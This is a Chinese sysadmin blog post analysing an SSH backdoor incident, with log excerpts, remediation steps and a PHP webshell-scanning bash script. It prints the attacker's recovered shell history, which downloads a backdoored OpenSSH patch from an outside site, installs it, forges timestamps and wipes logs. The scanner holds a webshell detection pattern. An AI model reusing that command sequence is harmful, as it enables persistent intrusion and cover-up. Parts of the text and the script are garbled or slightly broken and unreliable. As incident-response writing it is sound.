一次ssh被植入后门的经历及解决方案

一次ssh被植入后门的经历及解决方案

昨天发现服务器上很多程序流被镜像劫持，和开发设计一起解决了被镜像劫持的文档。今天早上发现游戏后台又打不开了，服务器上运行的频道文件都被删除了。index.php和admin.php修复后，一切都可以正常浏览。晚上没人上过服务器，可以判断服务器已经***，盘点刚刚开始:[/br]

1.首先查询安全日志，具体说明如下:

more /var/log/secure |grep Accepted

根据指令输出查询，以下记录可疑:

Jul 28 05:32:17 localhost sshd[21684]: Accepted password for root from 103.231.104.70 port 3551 ssh2 Jul 28 05:37:52 localhost sshd[22754]: Accepted password for root from 103.231.104.70 port 3602 ssh2 Jul 28 05:44:40 localhost sshd[23396]: Accepted password for root from 103.231.104.70 port 3650 ssh2

这个记录显示，5点32分，根据root账号，在103.231.104.70的ip成功登陆系统软件，在103.231.104.70的ip发现是香港特别行政区的详细地址，应该是代理的设备。

2.刚开始查询系统软件日志消息和wtmp日志，没发现什么问题。

3.我刚开始看所有的说明，发现了难题:

  387  cp -p /etc/ssh/sshd_config{,.bak}   388  wget www.k2a.cn/Tools/open.tar.gz   406  cd /etc/ssh/   407  ls   408  wget www.k2a.cn/Tools/patch.tar.gz   409  ls   410  tar -zxvf open.tar.gz   411  tar -zxvf patch.tar.gz   412  cd openssh-5.9p1.patch/   413  cp sshbd5.9p1.diff ../openssh-5.9p1   414  cd ../openssh-5.9p1   415  patch < sshbd5.9p1.diff   416  vim includes.h   417  ssh -V   418  vim includes.h   419  vi version.h    420  ssh -V   421  vi version.h    422  ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5   423  make   424  make install   425  id   426  touch -r sshd_config.bak ssh_config   427  cd ..   428  touch -r sshd_config.bak ssh_config   429  service sshd reload   430  ls   431  rm -rf *.tar.gz   432  rm -rf open*   433  rm -rf *.bak   437  cd /var/log/   439  rm -rf wtmp   440  rm -rf *log   442  cd /etc/scl/prefixes/   448  rm -rf *

根据以上历史数据，可以发现***在服务器上安装了ssh侧门。因为看过2~3篇关于ssh侧门的文章，感兴趣的朋友可以看看:

http://www.freebuf.com/tools/10474.html

http://redkey.blog.51cto.com/335290/1345091

根据上面的文章，***已经更改了ssh的版本号，之前的版本号仍由ssh-VV查询，现阶段应急解决方案:

重新安装openssh软件并升级到最新版本。

拆除ssh的默认端口号

在iptable中增加ssh浏览对策

如果重新安装最新版本的openssh，请制作&&Makeinstall有以下错误:

无法删除“/usr/bin/ssh”:不允许 *** 作

使用lsattr查询，我们发现ssh具有uSia的特性。用chattr去掉所有这个特性后，重装后一切正常！

安装完成后，您可以使用ssh-V再次检查版本号。

设计朋友也帮忙搜索***在编码，应用脚本做出以下:

#!/bin/bash #re=$(find -name "*.php" |xargs grep -l "common") if [ ! -d "$myPath"]; then         mkdir /tmp/safelog fi function checksafe() {    path="/home/web/$1"    cd $path    #re=$(find -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc")    re=$(find -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc|eval\(\\$\_POST\[|assert\(\\$\_POST\[")    len=$(expr length "$re")    if [ $(echo "$len > 0" | bc) -eq 1 ]; then                   echo "$re" > /opt/safelog/$1_$(date %Y%m%d).txt          #echo "$re" > $path/cache/safelog/$(date %Y%m%d).txt    fi    modifytime $i } function modifytime() {     re=$(find -mtime -1 -type f -name \*.php)     len=$(expr length "$re")     if [ $len -gt 0 ]; then             echo "$re" > /opt/safelog/$1_mf_$(date %Y%m%d).txt        #echo "$re" > $path/cache/safelog/mf_$(date %Y%m%d).txt     fi } ls=$(cd /home/web;ls) for i in $ls do   echo "$i"   checksafe $i done